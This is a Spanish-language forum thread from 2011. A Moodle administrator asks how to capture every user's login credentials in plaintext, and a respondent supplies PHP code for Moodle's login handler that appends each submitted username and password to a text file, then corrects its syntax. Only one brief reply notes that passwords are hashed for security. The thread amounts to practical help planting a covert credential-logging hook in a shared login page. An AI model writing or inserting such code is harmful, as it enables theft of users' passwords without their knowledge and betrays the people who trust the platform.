Foro de elhacker.net

Programación => PHP => Mensaje iniciado por: Luisinho_dinho en 5 Abril 2011, 19:02 pm



Título: Modificar el formulario login de Moodle
Publicado por: Luisinho_dinho en 5 Abril 2011, 19:02 pm
Tengo una plataforma moodle. Me gustaría modificarla para que, cada vez que alguien inicie sesión, se guarde usuario y contraseña en un archivo de texto o que se guarde en la base de datos sin codificar.

Investigando un poco, supongo que el formulario es este:
Código:
   <form action="<?php echo $CFG->httpswwwroot; ?>/login/index.php" method="post" id="login">
          <div class="loginform">
            <div class="form-label"><label for="username"><?php print_string("username") ?></label></div>
            <div class="form-input">
              <input type="text" name="username" id="username" size="15" value="<?php p($frm->username) ?>" />
            </div>
            <div class="clearer"><!-- --></div>
            <div class="form-label"><label for="password"><?php print_string("password") ?></label></div>
            <div class="form-input">
              <input type="password" name="password" id="password" size="15" value="" />
              <input type="submit" id="loginbtn" value="<?php print_string("login") ?>" />
              <div class="forgetpass"><a href="forgot_password.php"><?php print_string("forgotten") ?></a></div>
            </div>
            <div class="clearer"><!-- --></div>
          </div>
        </form>
      </div>
¿Cómo puedo hacerlo?

¡Gracias por su ayuda!


Título: Re: Modificar el formulario login de Moodle
Publicado por: ~ Yoya ~ en 5 Abril 2011, 20:10 pm
Esta codificado por seguridad, asi si alguien logra ingresar a la base de datos, puede tener todos los password...

Lo unico que tienes que hacer es crear una tabla o modificar una, y luego ir ingresando los datos...


Título: Re: Modificar el formulario login de Moodle
Publicado por: Luisinho_dinho en 5 Abril 2011, 22:53 pm
Pero, ¿Cómo hago que la contraseña ingresada se mande y se guarde en la base de datos? Mi nivel de PHP es bastante limitado.


Título: Re: Modificar el formulario login de Moodle
Publicado por: ~ Yoya ~ en 5 Abril 2011, 22:57 pm
Ps es necesario saber MYSQL y PHP...


Título: Re: Modificar el formulario login de Moodle
Publicado por: merolhack en 6 Abril 2011, 03:14 am
Hola, tienes que modificar los archivos PHP del login, en donde recibe los datos de ese formulario.

Bájate el Notepad++ y busca lo siguiente en todos los archivos:
$_POST['username']
Si no encuentras nada prueba con username

Ya que lo encuentres, toma ese valor y has un simple codigo que escriba un TXT:
Código:
$filename = "01042011/log4.txt";
$fh = fopen($filename, 'a+') or die("can't open file");
$stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password'];
fwrite($fh, $stringData);
fclose($fh);


Título: Re: Modificar el formulario login de Moodle
Publicado por: Luisinho_dinho en 11 Abril 2011, 23:40 pm
El código que me has pasado me da error en la 3º línea.
Código:
Parse error: syntax error, unexpected T_VARIABLE in /srv/www/htdocs/moodle/login/index.php on line 294
Corresponde a la línea:
Código:
$stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password'];



Título: Re: Modificar el formulario login de Moodle
Publicado por: merolhack en 12 Abril 2011, 06:43 am
Ah perdon, es algo así la concatenación:
Citar
$stringData = "Usuario: ".$_POST['username'] . " Contraseña: ".$_POST['password'];

Pero OJO, esto lo tienes que revisar bien en los archivos de Moodle, ya que no se si ahí es donde reciba los datos por POST, a mi Moodle se me hace que esta mal hecho...